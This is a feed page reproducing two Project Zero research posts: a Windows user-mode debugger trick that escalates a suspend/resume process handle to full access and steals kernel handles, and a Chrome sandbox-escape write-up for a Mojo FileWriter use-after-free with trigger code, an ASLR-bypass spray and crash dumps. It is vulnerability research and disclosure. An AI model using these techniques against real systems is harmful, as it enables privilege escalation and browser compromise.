Project Zero

Syndikovat obsah
News and updates from the Project Zero team at Google
Aktualizace: 1 hodina 20 sek zpět

Windows Exploitation Tricks: Abusing the User-Mode Debugger

16 Duben, 2019 - 18:24
Posted by James Forshaw, Google Project Zero
I've recently been adding native user-mode debugger support to NtObjectManager. Whenever I add new functionality I have to do some research and reverse engineering to better understand how it works. In this case I wondered what access you need to debug an existing running process and through that noticed an interesting security mismatch between what the user-mode APIs expose and what the kernel actually does which I thought would be interesting to document. What I’ll describe is not a security vulnerability, but it is useful for exploiting certain classes of bugs, which is why it fits in my series on exploitation tricks.
I'm not going to go into any great depth about how the user-mode debugger works under the hood -- if you want to know more Alex Ionescu wrote 3 whitepapers (1, 2, 3) over 12 years ago about the internals on Windows XP, and the internals haven't really changed much since. Given that observation, while I'm documenting the behavior on Windows 10 1809 I'm confident these techniques work on earlier releases Windows.Attaching to a Running ProcessDebugging on modern versions of Windows NT is based around the Debug kernel object, which you can create by calling the NtCreateDebugObject system call. This object acts as a bridge to assign processes for debugging and wait for debug events to be returned. The creation of this object is hidden from you by the Win32 APIs and each thread has its own debug object stored in its TEB.
If you want to attach to an existing process you can call the Win32 API DebugActiveProcess which has the prototype:
BOOL DebugActiveProcess(_In_ DWORD dwProcessId);
This ultimately calls the native API, NtDebugActiveProcess, which has the following prototype:
NTSTATUS NtDebugActiveProcess(    _In_ HANDLE ProcessHandle,    _In_ HANDLE DebugObjectHandle);
The DebugObjectHandle comes from the TEB, but requiring a process handle rather than a PID results in a mismatch between the call semantics of the two APIs. This means the Win32 API is responsible for opening a handle to a process, then passing that to the native API.
The question which immediately come to mind when I see code like this is what access does the Win32 API require and then what does the kernel API actually enforce? This isn't just idle musing, a common place for security vulnerabilities to manifest is in mismatched assumptions between interface layers. A good example is the discovery that NTFS hardlinks required a write access when being created from a Win32 application using CreateHardlink due to the user-mode API opening the target file with WRITE_ATTRIBUTES access. However, the kernel APIs didn't require any access (see my blog post about the hard link issue here) allows you to hardlink to any file you can open for any access. To find out what the Win32 API and Kernel APIs enforce we need to look at the code in a disassembler (or look at Alex's original write ups which has the code RE'd as well). The code in DebugActiveProcess calls a helper, ProcessIdToHandle to get the process handle which looks like the following:
HANDLE ProcessIdToHandle(DWORD dwProcessId) {  NTSTATUS Status;  OBJECT_ATTRIBUTES ObjectAttributes;  CLIENT_ID ClientId;  HANDLE ProcessHandle;  DWORD DesiredAccess = PROCESS_CREATE_THREAD |                        PROCESS_VM_OPERATION |                        PROCESS_VM_READ |                        PROCESS_VM_WRITE |                        PROCESS_QUERY_INFORMATION |                        PROCESS_SUSPEND_RESUME;
 ClientId.UniqueProcess = dwProcessId;  InitializeObjectAttributes(&ObjectAttributes, NULL, ...)    Status = NtOpenProcess(&ProcessHandle,                         DesiredAccess,                         &ObjectAttributes,                         &ClientId);  if (NT_SUCCESS(Status))    return ProcessHandle;  BaseSetLastNTError(Status);  return NULL;}
Nothing shocking about this code, a process is opened by its PID using NtOpenProcess. The code requires all the access rights that a debugger would expect:
  • Creating new threads, which is how the initial break point is injected.
  • Access to read and modify memory to write break points and inspect the running state of the process.
  • Suspending and resuming the entire process.
Once the kernel gets the process handle it needs to convert it back to a process object pointer using ObReferenceObjectByHandle. The API takes an desired access mask which is checked against the open handle access mask and only returns the pointer if the check succeeds. Here's the relevant snippet of code:
NTSTATUS NtDebugActiveProcess(HANDLE ProcessHandle,                              HANDLE DebugObjectHandle) {  PEPROCESS Process;  NTSTATUS status = ObReferenceObjectByHandle(             ProcessHandle,             PROCESS_SUSPEND_RESUME,             PsProcessType,             KeGetCurrentThread()->PreviousMode,             &Process);  // ...}
Here’s a pretty big mismatch in security expectations. The user mode API opens the process with much higher access than the kernel API requires. The kernel only enforces access to suspend and resume the target process. This makes sense from a kernel perspective (as Raymond Chen might say, looking at it through Kernel Colored Glasses) as the immediate effect of attaching a process to a debug object is to suspend the process. You'd assume that without having other access such as VM Read/Write there's not much debugging going on but from a kernel perspective that's irrelevant. All you need to use the kernel APIs is the ability to suspend/resume the process (through NtDebugContinue) and read events from the debug objects. The fact that you might get memory addresses in the debug events which you can’t access isn't that important from a design perspective.
Where's the problem you might ask? With only PROCESS_SUSPEND_RESUME access you can "debug" a process with limited access, but without the rest of the access rights you'd not be able to do that much. What can we do if we have only PROCESS_SUSPEND_RESUME access?Accessing Debug EventsThe answer to the question is based on the event you receive when you first wait for a debug event, CREATE_PROCESS_DEBUG_INFO. Note the native structure is slightly different but it's close enough for our purposes.
The create process event is received whenever you connect to an active process, it allows the debugger to synchronize its state by providing a set of events such as process creation, thread creation and loaded modules that you'd have received if you were directly starting a process under a debugger. In fact the NtDebugActiveProcess calls the method DbgkpPostFakeProcessCreateMessages which gives away the status of the debug events.
What's interesting about CREATE_PROCESS_DEBUG_INFO is you'll notice there are HANDLE parameters, hFile, hProcess and hThread corresponding to a file handle to the process executable, a handle to the process being debugged and finally a handle to the initial thread. Checking in DbgkpPostFakeProcessCreateMessages the objects are captured, however the handles are not generated. Instead the handles are created inside the NtWaitForDebugEvent system call, specifically in DbgkpOpenHandles. See if you can spot the problem with the following code snippet from that function:
NTSTATUS DbgkpOpenHandles(PDEBUG_EVENT Event,                          EPROCESS DebugeeProcess,                          PETHREAD DebugeeThread) {
 // Handle other event types first...  if (Event->DebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {    if (ObOpenObjectByPointer(DebugeeThread, 0, NULL,          THREAD_ALL_ACCESS, PsThreadType,          KernelMode, &Event->CreateProcess.hThread) < 0) {      Event->CreateProcess.hThread = NULL;    }        if (ObOpenObjectByPointer(DebugeeProcess, 0, 0,          PROCESS_ALL_ACCESS, PsProcessType,          KernelMode, &Event->CreateProcess.hProcess < 0) {      Event->CreateProcess.hThread = NULL;    }        ObDuplicateObject(PsGetCurrentProcess(),                      Event->CreateProcess.hFile,                      PsGetCurrentProcess(),                      &Event->CreateProcess.hFile, 0, 0,                      DUPLICATE_SAME_ACCESS, KernelMode);  }  // ...}
Did you spot the problem? This code is using the ObOpenObjectByPointer API to convert the debugee process and thread objects back to handles, that in itself is fine. However the problem is the API is called with the access mode set to KernelMode which means the call does not perform any access checking. That's not great but again wouldn’t be an issue if it wasn’t also requesting additional access above PROCESS_SUSPEND_RESUME. This code is effectively giving all access rights to the caller of NtWaitForDebugEvent to the debugged target process.
The result of this behavior is given a process handle with PROCESS_SUSPEND_RESUME it's possible to use that to get full access to the process and initial thread even if the objects wouldn't grant the caller that access. It might be argued that "You've attached the debugger to the process, what did you expect?". Well I would expect the caller would need to have opened suitable process and thread handles before attaching the debugger and use them to access the target, or if the kernel has to create new handles at least do an access check on them. This leads us to our first exploitation trick:
Exploitation trick: given a process handle with PROCESS_SUSPEND_RESUME access you can convert it to a full access process handle through the debugger APIs.
It’s probably rare you’ll encounter this type of bug as PROCESS_SUSPEND_RESUME is considered a write access to a process. Anything which would leak this access to a privileged process would also have leaked the other write accesses such as PROCESS_CREATE_THREAD or PROCESS_VM_WRITE and it’d be game over. To prove this exploit trick works the following is a simple PowerShell script which takes a process ID, opens the process for PROCESS_SUSPEND_RESUME, attaches it to a debugger, steals the handle and returns the full access handle.
param(    [Parameter(Mandatory)]    [int]$ProcessId)
# Get a privileged process handle with only PROCESS_SUSPEND_RESUME.Import-Module NtObjectManager
Use-NtObject($dbg = New-NtDebug -ProcessId $ProcessId) {    Use-NtObject($e = Start-NtDebugWait $dbg -Infinite) {        $dbg.Detach($ProcessId)        [NtApiDotNet.NtProcess]::DuplicateFrom($e.Process, -1)    }}
What about the third handle in CREATE_PROCESS_DEBUG_INFO, the handle to the process executable file? This has a different behavior, instead of opening a raw pointer it duplicates an existing handle. If you look at the code it seems to be duplicating from the current caller’s process and back again, why would it need to do the duplication if it was already in the debugger process? The key is the final parameter, again it’s passing KernelMode, which means ObDuplicateObject will actually duplicate a kernel handle to the current process. The file handle is opened when attaching to the process and uses the following code:
HANDLE DbgkpSectionToFileHandle(PSECTION Section) {  HANDLE FileHandle;  UNICODE_STRING Name;  OBJECT_ATTRIBUTES ObjectAttributes;  IO_STATUS_BLOCK IoStatusBlock;
 MmGetFileNameForSection(Section, &Name);
 InitializeObjectAttributes(&ObjectAttributes,      &Name,      OBJ_CASE_INSENSITIVE |      OBJ_FORCE_ACCESS_CHECK |      OBJ_KERNEL_HANDLE);
 ZwOpenFile(&FileHandle, GENERIC_READ | SYNCHRONIZE,             &ObjectAttributes, &IoStatusBlock,             FILE_SHARE_ALL, FILE_SYNCHRONOUS_IO_NONALERT);  return FileHandle;}
This code is careful to pass OBJ_FORCE_ACCESS_CHECK to the file open call to ensure it doesn’t give the debugger access to arbitrary files. The file handle is stored away to be reclaimed by the later call to NtWaitForDebugEvent. This leads us to our second, and final exploitation trick:
Exploitation trick: with an arbitrary kernel handle closing bug you can steal kernel handles.
The rationale behind this exploitation trick is that once the handle is captured it’s stored indefinitely, at least while the process still exists. The handle can be retrieved at any arbitrary point in time. This gives you a much bigger window to exploit a handle closing bug. An example of this bug class was one I found in a Novell driver, issue 274. In this case the driver wouldn’t check whether ZwOpenFile succeeded when writing a log entry and so would reuse the handle value stored in the stack when it called ZwClose. This results in an arbitrary kernel handle being closed. To exploit the Novell bug using the debugger you’d do the following:
  1. Generate a log entry to create a kernel handle which is then closed. The value on the stack is not overwritten.
  2. Debug a process to get the file handle allocated. Handle allocation is predictable so there’s a good chance that the same handle value will be reused as the one used with the bug.
  3. Trigger the handling closing bug, in this case it’ll close the existing value on the stack which is now allocated by the debugger resulting in a dangling handle value.
  4. Exercise code in the kernel to get the now unused handle value reallocated again. For example SepSetTokenCachedHandles called through NtCreateLowBoxToken will happily duplicate other kernel handles (although since I reported issue 483 there are fairly strict checks on what handles you can use.
  5. Get the debugger to return you the handle.

Handle closing bugs do exist, though they’re perhaps rare. Also you have to be careful, as typically closing an already closed kernel handle can result in a bug check.Wrapping Up
The behavior of user-mode debugging is another case where there are unexpected consequences to the design of the functionality. Nothing I’ve described here is a security vulnerability, but the behavior is interesting and it’s worth looking out for cases where it could be used.
Kategorie: Hacking & Security

Virtually Unlimited Memory: Escaping the Chrome Sandbox

11 Duben, 2019 - 20:18
Posted by Mark Brand, Exploit Technique Archaeologist.IntroductionAfter discovering a collection of possible sandbox escape vulnerabilities in Chrome, it seemed worthwhile to exploit one of these issues as a full-chain exploit together with a renderer vulnerability to get a better understanding of the mechanics required for a modern Chrome exploit. Considering the available bugs, the most likely appeared to be issue 1755, a use-after-free with parallels to classic Javascript engine callback bugs. This is a good candidate because of the high level of control the attacker has both over the lifetime of the free’d object, and over the timing of the later use of the object.
Apologies in advance for glossing over a lot of details about how the Mojo IPC mechanisms function - there’ll hopefully be some future blogposts explaining in more detail how the current Chrome sandbox interfaces look, but there’s a lot to explain!
For the rest of this blog post, we’ll be considering the last stable 64-bit release of Desktop Chrome for Windows before this issue was fixed, 71.0.3578.98.Getting startedOne of the most interesting things that we noticed during our research into the Chrome Mojo IPC layer is that it’s actually possible to make IPC calls directly from Javascript in Chrome! Passing the command line flag ‘--enable-blink-features=MojoJS’ to Chrome will enable this - and we used this feature to implement a Mojo fuzzer, which found some of the bugs reported.
Knowing about this feature, the cleanest way to implement a full Chrome chain would be to use a renderer exploit to enable these bindings in the running renderer, and then do our privilege elevation from Javascript!Exploiting the renderer_tsuro happened to have been working on an exploit for CVE-2019-5782, a nice bug in the v8 typer that was discovered by SOrryMybad and used at the Tian Fu Cup. I believe they have an upcoming blog post on the issue, so I’ll leave the details to them.
The bug resulted from incorrectly estimating the possible range of `arguments.length`; this can then be leveraged together with the (BCE) Bounds-Check-Elimination pass in the JIT.  Exploitation is very similar to other typer bugs - you can find the exploit in ‘many_args.js’. Note that as a result of _tsuro’s work, the v8 team have removed the BCE optimisation to make it harder to exploit such issues in the typer!
The important thing here is that we’ll need to have a stable exploit - in order to launch the sandbox escape, we need to enable the Mojo bindings; and the easiest way to do this needs us to reload the main frame, which will mean that any objects we leave in a corrupted state will become fair game for garbage collection.Talking to the Browser ProcessLooking through the Chrome source code, we can see that the Mojo bindings are added to the Javascript context in RenderFrameImpl::DidCreateScriptContext, based on the member variable enabled_bindings_. So, to mimic the command line flag we can use our read/write to set that value to BINDINGS_POLICY_MOJO_WEB_UI, and force the creation of a new ScriptContext for the main frame and we should have access to the bindings!
It’s slightly painful to get hold of the RenderFrameImpl for the current frame, but by following a chain of pointers from the global context object we can locate chrome_child.dll, and find the global `g_frame_map`, which is a map from blink::Frame pointers to RenderFrameImpl pointers. For the purposes of this exploit, we assume that there is only a single entry in this map; but it would be simple to extend this to find the right one. It’s then trivial to set the correct flag and reload the page - see `enable_mojo.js` for the implementation.
Note that Chrome randomizes the IPC ordinals at build time, so in addition to enabling the bindings, we also need to find the correct ordinals for every IPC method that we want to call. This can be resolved in a few minutes of time in a disassembler of your choice; given that the renderer needs to be able to call these IPC methods, this is just a slightly annoying obfuscation that we could engineer around if we were trying to support more Chrome builds, but for the one version we’re supporting here it’s sufficient to modify the handful of javascript bindings we need:
var kBlob_GetInternalUUID_Name = 0x2538AE26;
var kBlobRegistry_Register_Name = 0x2158E98A;var kBlobRegistry_RegisterFromStream_Name = 0x719E4F82;
var kFileSystemManager_Open_Name = 0x305E02BE;var kFileSystemManager_CreateWriter_Name = 0x63B8D2A6;
var kFileWriter_Write_Name = 0x64D4FC1C;The bugSo we’ve got access to the IPC interfaces from Javascript - what now?
The bug that we’re looking at is an issue in the implementation of the FileWriter interface of the FileSystem API. This is the interface description for the FileWriter interface, which is an IPC endpoint vended by the privileged browser process to the unprivileged renderer process to allow the renderer to perform brokered file writes to special sandboxed filesystems:
// Interface provided to the renderer to let a renderer write data to a file.interface FileWriter {  // Write data from |blob| to the given |position| in the file being written  // to. Returns whether the operation succeeded and if so how many bytes were  // written.  // TODO(mek): This might need some way of reporting progress events back to  // the renderer.  Write(uint64 position, Blob blob) => (mojo_base.mojom.FileError result,                                        uint64 bytes_written);
 // Write data from |stream| to the given |position| in the file being written  // to. Returns whether the operation succeeded and if so how many bytes were  // written.  // TODO(mek): This might need some way of reporting progress events back to  // the renderer.  WriteStream(uint64 position, handle<data_pipe_consumer> stream) =>        (mojo_base.mojom.FileError result, uint64 bytes_written);
 // Changes the length of the file to be |length|. If |length| is larger than  // the current size of the file, the file will be extended, and the extended  // part is filled with null bytes.  Truncate(uint64 length) => (mojo_base.mojom.FileError result);};
The vulnerability was in the implementation of the first method, Write. However, before we can properly understand the bug, we need to understand the lifetime of the FileWriter objects. The renderer can request a FileWriter instance by using one of the methods in the FileSystemManager interface:
// Interface provided by the browser to the renderer to carry out filesystem// operations. All [Sync] methods should only be called synchronously on worker// threads (and asynchronously otherwise).interface FileSystemManager {  // ...
 // Creates a writer for the given file at |file_path|.  CreateWriter(url.mojom.Url file_path) =>      (mojo_base.mojom.FileError result,       blink.mojom.FileWriter? writer);
 // ...};
The implementation of that function can be found here:
void FileSystemManagerImpl::CreateWriter(const GURL& file_path,                                         CreateWriterCallback callback) {  DCHECK_CURRENTLY_ON(BrowserThread::IO);
 FileSystemURL url(context_->CrackURL(file_path));  base::Optional<base::File::Error> opt_error = ValidateFileSystemURL(url);  if (opt_error) {    std::move(callback).Run(opt_error.value(), nullptr);    return;  }  if (!security_policy_->CanWriteFileSystemFile(process_id_, url)) {    std::move(callback).Run(base::File::FILE_ERROR_SECURITY, nullptr);    return;  }
 blink::mojom::FileWriterPtr writer;  mojo::MakeStrongBinding(std::make_unique<storage::FileWriterImpl>(                              url, context_->CreateFileSystemOperationRunner(),                              blob_storage_context_->context()->AsWeakPtr()),                          MakeRequest(&writer));  std::move(callback).Run(base::File::FILE_OK, std::move(writer));}
The implication here is that if everything goes correctly, we’re returning a std::unique_ptr<storage::FileWriterImpl> bound to a mojo::StrongBinding. A strong binding means that the lifetime of the object is bound to the lifetime of the Mojo interface pointer - this means that the other side of the connection can control the lifetime of the object - and at any point where the code in storage::FileWriterImpl yields control of the sequence associated with that binding, the connection could be closed and the instance could be free’d.
This gives us a handle to the blink::mojom::FileWriter Mojo interface described here; the function of interest to us is the Write method, which has a handle to a blink::mojom::Blob as one of it’s parameters. We’ll look at this Blob interface again shortly.
With this in mind, it’s time to look at the vulnerable function.
void FileWriterImpl::Write(uint64_t position,                           blink::mojom::BlobPtr blob,                           WriteCallback callback) {  blob_context_->GetBlobDataFromBlobPtr(      std::move(blob),      base::BindOnce(&FileWriterImpl::DoWrite, base::Unretained(this),                     std::move(callback), position));}
Now, it’s not immediately obvious that there’s an issue here; but in the Chrome codebase instances of base::Unretained which aren’t immediately obviously correct are often worth further investigation (this creates an unchecked, unowned reference - see Chrome documentation). So; this code can only be safe if GetBlobDataFromBlobPtr always synchronously calls the callback, or if destroying this will ensure that the callback is never called. Since blob_context_ isn’t owned by this, we need to look at the implementation of GetBlobDataFromBlobPtr, and the way in which it uses callback:
void BlobStorageContext::GetBlobDataFromBlobPtr(    blink::mojom::BlobPtr blob,    base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback) {  DCHECK(blob);  blink::mojom::Blob* raw_blob = blob.get();  raw_blob->GetInternalUUID(mojo::WrapCallbackWithDefaultInvokeIfNotRun(      base::BindOnce(          [](blink::mojom::BlobPtr, base::WeakPtr<BlobStorageContext> context,             base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback,             const std::string& uuid) {            if (!context || uuid.empty()) {              std::move(callback).Run(nullptr);              return;            }            std::move(callback).Run(context->GetBlobDataFromUUID(uuid));          },          std::move(blob), AsWeakPtr(), std::move(callback)),      ""));}
The code above is calling an asynchronous Mojo IPC method GetInternalUUID on the blob parameter that’s passed to it, and then (in a callback) when that method returns it’s using the returned UUID to find the associated blob data (GetBlobDataFromUUID), and calling the callback parameter with this data as an argument.
We can see that the callback is passed into the return callback for an asynchronous Mojo function exposed by the Blob interface:
// This interface provides access to a blob in the blob system.interface Blob {  // Creates a copy of this Blob reference.  Clone(Blob& blob);
 // Creates a reference to this Blob as a DataPipeGetter.  AsDataPipeGetter(network.mojom.DataPipeGetter& data_pipe_getter);
 // Causes the entire contents of this blob to be written into the given data  // pipe. An optional BlobReaderClient will be informed of the result of the  // read operation.  ReadAll(handle<data_pipe_producer> pipe, BlobReaderClient? client);
 // Causes a subrange of the contents of this blob to be written into the  // given data pipe. If |length| is -1 (uint64_t max), the range's end is  // unbounded so the entire contents are read starting at |offset|. An  // optional BlobReaderClient will be informed of the result of the read  // operation.  ReadRange(uint64 offset, uint64 length, handle<data_pipe_producer> pipe,            BlobReaderClient? client);
 // Reads the side-data (if any) associated with this blob. This is the same  // data that would be passed to OnReceivedCachedMetadata if you were reading  // this blob through a blob URL.  ReadSideData() => (array<uint8>? data);
 // This method is an implementation detail of the blob system. You should not  // ever need to call it directly.  // This returns the internal UUID of the blob, used by the blob system to  // identify the blob.  GetInternalUUID() => (string uuid);};
This means that we can provide an implementation of this Blob interface hosted in the renderer process; pass an instance of that implementation into the FileWriter interface’s Write method, and we’ll get a callback from the browser process to the renderer process during the execution of GetBlobDataFromBlobPtr, during which we can destroy the FileWriter object. The use of base::Unretained here would be dangerous regardless of this callback, but having it scheduled in this way makes it much cleaner to exploit.Step 1: A TriggerFirst we need to actually reach the bug - this is a minimal trigger from Javascript using the MojoJS bindings we enabled earlier. A complete sample is attached to the bugtracker entry - the file is ‘trigger.js’
async function trigger() {  // we need to know the UUID for a valid Blob  let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();  Mojo.bindInterface(blink.mojom.BlobRegistry.name,                     mojo.makeRequest(blob_registry_ptr).handle, "process");
 let bytes_provider = new BytesProviderImpl();  let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();  bytes_provider.binding.bind(mojo.makeRequest(bytes_provider_ptr));
 let blob_ptr = new blink.mojom.BlobPtr();  let blob_req = mojo.makeRequest(blob_ptr);
 let data_element = new blink.mojom.DataElement();  data_element.bytes = new blink.mojom.DataElementBytes();  data_element.bytes.length = 1;  data_element.bytes.embeddedData = [0];  data_element.bytes.data = bytes_provider_ptr;
 await blob_registry_ptr.register(blob_req, 'aaaa', "text/html", "", [data_element]);
 // now we have a valid UUID, we can trigger the bug  let file_system_manager_ptr = new blink.mojom.FileSystemManagerPtr();  Mojo.bindInterface(blink.mojom.FileSystemManager.name,                     mojo.makeRequest(file_system_manager_ptr).handle, "process");
 let host_url = new url.mojom.Url();  host_url.url = window.location.href;
 let open_result = await file_system_manager_ptr.open(host_url, 0);
 let file_url = new url.mojom.Url();  file_url.url = open_result.rootUrl.url + '/aaaa';
 let file_writer = (await file_system_manager_ptr.createWriter(file_url)).writer;
 function BlobImpl() {    this.binding = new mojo.Binding(blink.mojom.Blob, this);  }
 BlobImpl.prototype = {    getInternalUUID: async (arg0) => {      // here we free the FileWriterImpl in the callback      create_writer_result.writer.ptr.reset();
     return {'uuid': 'aaaa'};    }  };
 let blob_impl = new BlobImpl();  let blob_impl_ptr = new blink.mojom.BlobPtr();  blob_impl.binding.bind(mojo.makeRequest(blob_impl_ptr));
 file_writer.write(0, blob_impl_ptr);}Step 2: ReplacementAlthough it’s likely not to be of much use in the end, I usually like to start the process of exploiting a use-after-free by replacing the object with completely attacker controlled data - although without an ASLR bypass or an information leak, it’s unlikely we can do anything useful with this primitive, but it’s often useful to get an understanding of the allocation patterns around the object involved, and it gives a clear crash that’s useful to demonstrate the likely exploitability of the issue.
On the Windows build that we’re looking at, the size of the FileWriterImpl is 0x140 bytes. I originally looked at using the Javascript Blob API directly to create allocations, but this causes a number of additional temporary allocations of the same size, which significantly reduces reliability. A better way to cause allocations of a controlled size with controlled data in the browser process is to register new Blobs using the BlobRegistry registerFromStream method - this will perform all of the secondary allocations during the initial call to registerFromStream, and we can then trigger a single allocation of the desired size and contents later by writing data into the DataPipeProducerHandle.
We can test this (see ‘trigger_replace.js’), and indeed it does reliably replace the free’d object with a buffer containing completely controlled bytes, and crashes in the way we’d expect:
(1594.226c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.chrome!storage::FileSystemOperationRunner::GetMetadata+0x33:00007ffc`362a1a99 488b4908        mov     rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????0:002> rrax=0000ce61f98b376e rbx=0000021b30eb4bd0 rcx=2323232323232323rdx=0000021b30eb4bd0 rsi=0000005ae4ffe3e0 rdi=2323232323232323rip=00007ffc362a1a99 rsp=0000005ae4ffe2f0 rbp=0000005ae4ffe468 r8=0000005ae4ffe35c  r9=0000005ae4ffe3e0 r10=0000021b30badbf0r11=0000000000000000 r12=0000000000000000 r13=0000005ae4ffe470r14=0000000000000001 r15=0000005ae4ffe3e8iopl=0         nv up ei pl nz na pe nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202chrome!storage::FileSystemOperationRunner::GetMetadata+0x33:00007ffc`362a1a99 488b4908        mov     rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????0:002> k # Child-SP          RetAddr           Call Site00 0000005a`e4ffe2f0 00007ffc`362a74ed chrome!storage::FileSystemOperationRunner::GetMetadata+0x33 01 0000005a`e4ffe3a0 00007ffc`362a7aef chrome!storage::FileWriterImpl::DoWrite+0xed…Step 3: Information LeakIt’s not much use controlling the data in the free’d object, when we need to be able to put valid pointers in there - so at this point we need to consider how the free’d object is used, and what options we have for replacing the free’d object with a different type of object, essentially turning the use-after-free into a type-confusion in a way that will achieve something useful to us.
Looking through objects of the same size in windbg however did not provide any immediate answers - and since most of the methods being called from DoWrite are non-virtual, we actually need quite a large amount of structure to be correct in the replacing object.
void FileWriterImpl::DoWrite(WriteCallback callback,                             uint64_t position,                             std::unique_ptr<BlobDataHandle> blob) {  if (!blob) {    std::move(callback).Run(base::File::FILE_ERROR_FAILED, 0);    return;  }  // FileSystemOperationRunner assumes that positions passed to Write are always  // valid, and will NOTREACHED() if that is not the case, so first check the  // size of the file to make sure the position passed in from the renderer is  // in fact valid.  // Of course the file could still change between checking its size and the  // write operation being started, but this is at least a lot better than the  // old implementation where the renderer only checks against how big it thinks  // the file currently is.  operation_runner_->GetMetadata(      url_, FileSystemOperation::GET_METADATA_FIELD_SIZE,      base::BindRepeating(&FileWriterImpl::DoWriteWithFileInfo,                          base::Unretained(this),                          base::AdaptCallbackForRepeating(std::move(callback)),                          position, base::Passed(std::move(blob))));}
So; we’re going to make a non-virtual call to FileSystemOperationRunner::GetMetadata with a this pointer taken from inside the free’d object:
OperationID FileSystemOperationRunner::GetMetadata(    const FileSystemURL& url,    int fields,    GetMetadataCallback callback) {  base::File::Error error = base::File::FILE_OK;  std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(      file_system_context_->CreateFileSystemOperation(url, &error));  ...}
And that will then make a non-virtual call to FileSystemContext::CreateFileSystemOperation with a this pointer taken from inside whatever the previous this pointer pointed to…
FileSystemOperation* FileSystemContext::CreateFileSystemOperation(    const FileSystemURL& url, base::File::Error* error_code) {  ...
 FileSystemBackend* backend = GetFileSystemBackend(url.type());  if (!backend) {    if (error_code)      *error_code = base::File::FILE_ERROR_FAILED;    return nullptr;  }
 ...}
Which will then finally expect to be able to lookup a FileSystemBackend pointer from an std::map contained inside it!
FileSystemBackend* FileSystemContext::GetFileSystemBackend(    FileSystemType type) const {  auto found = backend_map_.find(type);  if (found != backend_map_.end())    return found->second;  NOTREACHED() << "Unknown filesystem type: " << type;  return nullptr;}
This is quite a comprehensive set of constraints. (If we can meet them all, the call to backend->CreateFileSystemOperation is finally a virtual call which would be where we’d hope to achieve a useful side-effect).
After looking through the types of the same size (0x140 bytes), nothing jumped out as being both easy to allocate in a controlled way, and also overlapping in a compatible way - so we can instead consider an alternative approach. On Windows, the freeing of a heap block doesn’t (immediately) corrupt the data it contains - so if we can groom to make sure that the FileWriterImpl allocation isn’t reused, we can instead replace the FileSystemOperationRunner object directly, and access it through the stale pointer. This reduces one dereference from our constraints, and means we are looking in a different size class (0x80 bytes)… There are roughly 1000 object types of this size, and again nothing is obviously useful, so maybe we can consider alternative solutions...Step 4: Information Leak (round #2)Tired of staring at structure layouts in the debugger, time to consider any alternative we could come up with. The ASLR implementation on Windows means that if the same library is loaded in multiple processes, it will be at the same base address; so any library loaded in the renderer will be loaded at a known address in the browser process.
There are a few objects we could replace the FileSystemOperationRunner with that would line up the FileSystemContext pointer to controlled string data; we could use this to fake the first/begin node of the backend_map_ with a pointer into the data section of one of the modules that we can locate, and there line things up correctly so that we could lookup the first entry. This only required an even smaller set of constraints:
ptr = getPtr(address)
getUint8(ptr + 0x19) == 0getUint32(ptr + 0x20) == 0obj = getPtr(ptr + 0x28)
vtable = getPtr(obj)
function = getPtr(vtable + 0x38)
The set of addresses which meet these constraints, unfortunately, does not really produce any useful primitives.Step 5: ASLR BypassHaving almost completely given up, we remembered one of the quirks related to issue 1642, a bug in the Mojo core code. Specifically; when the receiving end of a Mojo connection receives a DataPipe*Dispatcher object, it will immediately map an associated shared memory section (the mapping occurs inside the call to InitializeNoLock).
Since there’s no memory or virtual address space limit in the browser process, this suggests that in fact, we may be able to completely bypass ASLR without an information leak if we can simply spray the virtual address space of the browser with shared memory mappings. Note - the renderer limits will still be applied, so we need to find a way to do this without exceeding the renderer limits. This should be fairly trivial from native code running in the renderer; we can simply duplicate handles to the same shared memory page, and repeatedly send them - but it would be nice to stay in Javascript.
Looking into the IDL for the MojoHandle interface in MojoJS bindings, we can note that while we can’t clone DataPipe handles, we can clone SharedBuffer handles.
interface MojoHandle {   ...      // TODO(alokp): Create MojoDataPipeProducerHandle and MojoDataPipeConsumerHandle,   // subclasses of MojoHandle and move the following member functions.   MojoWriteDataResult writeData(BufferSource buffer, optional MojoWriteDataOptions options);  MojoReadDataResult queryData();   MojoReadDataResult discardData(unsigned long numBytes, optional MojoDiscardDataOptions options);   MojoReadDataResult readData(BufferSource buffer, optional MojoReadDataOptions options);
  // TODO(alokp): Create MojoSharedBufferHandle, a subclass of MojoHandle   // and move the following member functions.   MojoMapBufferResult mapBuffer(unsigned long offset, unsigned long numBytes);   MojoCreateSharedBufferResult duplicateBufferHandle(optional MojoDuplicateBufferHandleOptions options);};
Unfortunately, SharedBuffers are used much less frequently in the browser process interfaces, and they’re not automatically mapped when they are deserialized, so they’re less useful for our purposes. However, since both SharedBuffers and DataPipes are backed by the same operating-system level primitives, we can still use this to our advantage; by creating an equal number of DataPipes with small shared memory mappings, and clones of a single, large SharedBuffer, we can then use our arbitrary read-write to swap the backing buffers!

As we can see in the VMMap screenshot above - this is both effective and quick! The first test performed a 16-terabyte spray, which got a bit laggy, but in the real-world about 3.5-terabytes appears sufficient to get a reliable, predictable address. Finally, a chance to cite SkyLined’s exploit for MS04-040 in a modern 64-bit Chrome exploit!
A little bit of fiddling later:
rax=00000404040401e8 rbx=000001fdba193480 rcx=00000404040401e8rdx=000001fdba193480 rsi=00000002f39fe97c rdi=00000404040400b0rip=00007ffd87270258 rsp=00000002f39fe8c0 rbp=00000002f39fea88 r8=00000404040400b0  r9=00000002f39fe8e4 r10=00000404040401f0r11=0000000000000000 r12=0000000000000000 r13=00000002f39fea90r14=0000000000000001 r15=00000002f39fea08iopl=0         nv up ei pl nz na po nccs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206chrome!storage::FileSystemContext::CreateFileSystemOperation+0x4c:00007ffd`87270258 41ff5238        call    qword ptr [r10+38h] ds:00000404`04040228=4141414141414141RoadmapOk, at this point we should have all the heavy machinery that we need - the rest is a matter of engineering. For the detail-oriented; you can find a full, working exploit in the bugtracker, and you should be able to identify the code handling all of the following stages of the exploit:
  1. Arbitrary read-write in the renderer
    1. Enable MojoJS bindings
    2. Launch sandbox escape
  2. Sandbox escape
    1. Arbitrary read-write in the renderer (again…)
